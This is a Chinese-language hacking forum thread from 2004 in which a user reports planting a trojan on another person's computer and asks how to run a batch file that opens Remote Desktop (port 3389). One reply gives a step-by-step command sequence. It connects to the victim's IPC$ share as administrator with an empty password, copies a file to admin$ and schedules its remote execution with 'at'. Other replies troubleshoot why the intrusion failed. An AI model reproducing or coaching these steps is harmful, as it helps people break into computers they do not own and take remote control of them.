|
 | 作者: csir [csir]
 论坛用户 |
登录 |
| 我已经把木马上传到对方的机子上,然后怎么让它启动呀?而且我已经可以用了他的TELNET服务了,我新建后的用户也是权限Administrators的,我想用wind.bat开他的3389,并已经将这个文件上传到了它电脑上C:\WINNT\SYSTEM32\目录下!然后我该怎么启动这个(wind.bat)程序呢?? |
| 地主 发表时间: 04-01-04 17:38 |
 | 回复: zybzc [zybzc]  论坛用户 |
登录 |
|
把过程都发一下吧 ―――――――――――――――――――――――――――――――――――――――― C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us er:administrator----------------连接成功! 命令成功完成。 C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm in$-----------------------------拷贝wind.bat到目标计算机的admin$目录 已复制 1 个文件。 C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.* \\218.22.155.* 的当前时间是 2002/12/1 上午 06:37 命令成功完成。 C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wind.bat 新加了一项作业,其作业 ID = 1--指定wind.bat在06:39运行 ―――――――――――――――――――――――――――――――――――― 好明显 建立连接之后 你只做后面2步了 [此贴被 ○o紫龙o○(zybzc) 在 01月04日17时58分 编辑过] |
| B1层 发表时间: 04-01-04 17:57 |
| 回复: csir [csir] 论坛用户 |
登录 |
|
偶就是这么做的啊!为什么对方3389还不开!?真是气死人啊!! |
| B2层 发表时间: 04-01-04 18:00 |
| 回复: zybzc [zybzc] 论坛用户 |
登录 |
|
人家有监控吧 我用瑞星就可以监控到 运行什么可惜的 命令和代码都被剿灭 |
| B3层 发表时间: 04-01-04 19:27 |
| 回复: csir [csir] 论坛用户 |
登录 |
|
偶明白了!! 我AT的东东是一个BAT文件嘛,运行后就会弹出一个类似DOS的窗口弹出后人家还不把他关了?!~ 呵呵我真够蠢的~~ |
| B4层 发表时间: 04-01-04 19:29 |
| 回复: lijingxi [lijingxi]  见习版主 |
登录 |
|
我感觉问题好象不是出在这 好象是需要对方从新启动计算机才可以让对方开放终端服务的! 不知道你是不是让对方的计算机从新启动了! |
| B5层 发表时间: 04-01-04 19:57 |
| 回复: csir [csir] 论坛用户 |
登录 |
|
不是吧,我在我机子上试过,怎么打开这个文件后,3秒钟端口就开了啊!!也没重启啊! |
| B6层 发表时间: 04-01-04 20:11 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 我已经把木马上传到对方的机子上,然后怎么让它启动呀?